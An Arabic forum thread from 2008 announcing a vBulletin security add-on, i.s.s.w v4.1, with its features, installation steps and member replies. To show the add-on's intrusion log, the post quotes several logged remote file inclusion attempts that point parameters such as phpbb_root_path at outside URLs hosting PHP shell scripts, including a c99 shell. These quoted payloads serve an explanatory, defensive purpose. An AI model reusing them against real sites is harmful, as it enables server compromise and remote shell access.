الان احمي منتداك من الاختراقات هاك الحمايه الشامل i.s.s.w v4.1

op4host · 26-05-2008, 01:06 AM

بسم الله الرحمن الرحيم

اسم المنتج : حماية المنتدي i.s.s.w
الإصدار : i.s.s.w v 4.1
المبرمجين : الفريق الامني M.M.A i.s.s.w
جديد الاصدار :
1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم
2: امكانية التحكم في الصفحة التي تعرض للمخترق
3: اضافه لوحت تحكم مختصره cp vb
4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار
5 : تنبية في التحديث
6: تعديلات في عمل الهاك وتحديثة
7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد
8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد
9: تغير نمط الحقوق وحذف الايقونه ووضح كود لتحقق من عدم ازارله الحقوق وهذا من حقنا

نطلب الدعاء لنا في التوفيق وثبات الايمان
اضافه Spacer_Open و Spacer_Close من M.M.A الفريق الامني

عمل الهاك : حماية المنتدى بشكل كامل بعون الله

********************************
الخيار الاول : لتشغيل حمايه المنتدي

منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح

منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%

حجب عدة مواقع تساعد على العبث في المنتديات

تطوير للدوال القديمة للتوافق معه السيرفر

منع اكثر اوامر اليونكس وحيل الحقن في الشيل

اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك :1 (79):

الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع

الان نأتي للقسم الاكثر اثارة للموضوع

عند دخولك مجلد sec

افتح الملف logfile_hacker.txt

ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل

كود PHP:

2007-12-11, 05:50:44, 1197370244, 209.67.223.188, p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808
2007-12-11, 06:32:22, 1197372742, 203.211.135.147, t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808

كود PHP:

2007-12-11, 07:09:46, 1197374986, 211.157.108.187, p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79 2007-12-11, 09:15:08, 1197382508, 200.102.138.66, t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library)

الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر

طبعا الفاصلة تفصل بين كل معلومه ومعلومة

كود PHP:

كود PHP:

,

التاريخ والوقت

كود PHP:

كود PHP:

2007-12-11, 05:50:44,

عدد المحاولات

كود PHP:

كود PHP:

1197370244

ايبي الموقع المصااب

كود PHP

كود PHP:

209.67.223.188

الاصابة طبعا تشفرت لاغراض امنيه

كود PHP:

كود PHP:

p=11575//codebb/lang_select

الاستغلال

كود PHP:

كود PHP:

?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?

نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه

كود PHP:

كود PHP:

libwww-perl/5.808

الان شرح التركيب

امسح جميع هاكات لها علاقه في الحمايه او منع xss

اما من ركب هاك الحمايه issw v4.0 issw v3

عليه فقط حذف ملف البرودكت

وتركيب المحدث

شرح حذف الهاك

من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت

ومن ثم حذف توابعه

*********************************

*---**-* التركيب *-**---*

لمهم ناتي الى طريقة التثبيت نرفع ما بداخل
upload
ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666 counter.txt logfile_hacker.txt

وارفع cpnav_issw
داخل
vb\includes\xml
قوم باستدعاء البروديكت من لوحت تحكم المنتدي

واتمنى لكم النجاح في التنصيب
ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور

مع
تحيات الفريق الامني

الان من لوحت تحكم المنتدي قم برفع البرودكت

تم تجربت المنتج على الاصدار

3.6.x

3.7.0

لمن لديه اقتراح او تطوير او استفسار او وجد خلل في البرودكت

يطرحه هنا في الموضوع لنصل لتطوير اكثر

وجل من لا يخطأ وانتظر استفساراتكم

((((وياريت مش يكون استفسار بل فكرة لتطوير او لتحديث لاى هاك لاى اسكربت
انحن شعب ياخذ ولا يفكر كى يعطى لقد خاب ظنى ولاكن هناك قلة من الاعضاء المميزين مثل ابو بسنت فهو يريد ان ياخذ ويعطى ما لدية واعرف ان هناك المزيد منك اى المتميزين ولاكن اين هم لماذا لا يظهرون اسالونى فلن ابخل عليكم بالعلم فقد تعهدت امام الله انا اعطى العلم لمن يريدة وارجو من الله ان تكونو من طالبى العلم لكى تتميزو )

لنرجع الى الهاك المميزززززززززززز جدا

لتتبع جديد الهاك على الرابط التالي

http://www.is-sw.net/index.php?issw=isswvb

الحمد لله على كل شيء

ولاكن الموقع الاساسى واقع حاليا

اتمنى عدم تركيبه لمواقع اباحيه او مواقع تتوجه لمعادات الاسلام واهل الكتاب السنه
وشكرا لكم

المصدر
http://www.is-sw.net/vb/showthread.php?t=4329
ولاكن الموقع الاساسى واقع حاليا

ملحوظة ::
يوجد شبه في 20 %

بين الهاك التركي وبين هاك فريق i.s.s.w
لاكن الاساس للفكره هي مبرمج واحد وهو i.s.s.w
هاك الفريق الامني مطور كليا عن الهاك التركي

يتميز في عده ميزات
الاول الامان والدقه في البرمجة حيث يمتلك اربع صفات لاتوجد في غيره بسهوله
يتميز هاك الفريق الامني في حمايه ملف config من العرض في الشيل او عن طريق عرض السورس له

ونسبه نجاح التصدي 60% لاكن اذا تم عرض السورس لملف الكونفيق من موقع ما على السيرفر فهذي الحمايه تفقد ميزتها بعون الله سوف نجد لهذه الحركه الحل
*****************************************
ثانيا :تعرضت المنتديات العربيه في الفتره الاخيره لنوعين من الحقن في التمبلتات الحمد لله في هذا الاصدار تم غلقهم نهائي دون التعديل على القوالب
*****************************************
ثالثا :ميزه الاستعلام والحذف الجماعي او استغلال رقم العضويه دون الدخول للمنتدي في شكل كامل فهوا يحمي من استعلاماتها
*****************************************
رابعا : اكواد التحويل وسحب الكوكيز واستغلالت كثيره تخص xss تم تلافيها في هذا الاصدار من الحمايه القويه
*****************************************

وتوجد ميز اخرى ونقاط استطيع توضيحها بسهوله لاكن التجربه خير برهان على ما اقول

بالنسبه للهاك Product Rg Security

هو عباره عن مجمع لسرقه حقوق مبرمجين عرب واجانب ولا توجد اي اضافه حصريه فيه ويمكنك الاطلاع على سورس البرنامج ولايوجد فيه ترابط انما مضهري غير جوهري
تجد فيه عده برمجيات جمعت باضافه الابلينق وهذا له استغلالات كثيره وخطوره ويمكن اي مبرمج توضيح هذا

قد وضح هذا الامر اخونا بارك الله فية i.s.s.w

واكيد اخى العزيز ابو الليل يعرفة كما اعرفة انا شخصياً فهوة متميز

بارك الله فيكم

الهاك بالمرفقات

اخوكم
دكتور/ كمال محمد محمد
************************************************** **************************

الموضوع الأصلي : الان احمي منتداك من الاختراقات هاك الحمايه الشامل i.s.s.w v4.1 -||- المصدر : |: معهد أول ستايل :| -||- الكاتب : op4host

تمتمات · 06-06-2008, 09:31 PM

يعطيك العافية دكتور/ كمال محمد محمد

مشكور على الهاك

MoGaa.NeT · 08-06-2008, 12:37 AM

ولله احيانا احس ان الاختراق عن طريق هاكات الحمايه الي مثل هذاي

يلا الله يعين

Abo_ELleal · 08-06-2008, 01:26 AM

بارك الله فيك ورعاك اخوي كمال

اقتباس:

المشاركة الأصلية كتبت بواسطة MoGaa.NeT

ولله احيانا احس ان الاختراق عن طريق هاكات الحمايه الي مثل هذاي

اقتباس:

المشاركة الأصلية كتبت بواسطة MoGaa.NeT

يلا الله يعين

معك حق اخوي الغالي بو حبيبة
ولكن لا تنسي ان الهاك عرض بين اكبر المطورين
وحسب ما سمعت ايضاً ان الهاك اجنبي
ومعرب فقط

op4host · 08-06-2008, 01:33 AM

لاكن اخى الحبيب ابو الليل تعرف ان الفريق الامنى الذى برمج هذا الهاك الذى يوجد عندنا وعندى فى كل منتدياتى فهم فريق ممتاز بصراحة

فهاك من برمجيتهم مش اخاف منة كتير وى الباقى

بارك الله فيك اخى العزيز ورعاك المولى عز وجل

SeRvEr · 08-06-2008, 03:24 AM

مشكور اخوي
وربي يوفق من قام بعمل هذا الهاك الرائع جداً

op4host · 08-06-2008, 07:51 PM

مشكور اخويا الاعزيز سيرفر
على شرف مرورك
وردك على الموضوع

tun!siano · 16-03-2009, 05:41 PM

ssssssssssssssssssssssssssssssssssssssssssssssssss sssssssssss

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
انواع عرض الموضوع
العرض العادي الانتقال إلى العرض المتطور الانتقال إلى العرض الشجري

الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)

الان احمي منتداك من الاختراقات هاك الحمايه الشامل i.s.s.w v4.1

قسم تطوير منتديـــــvb3.6.0ــات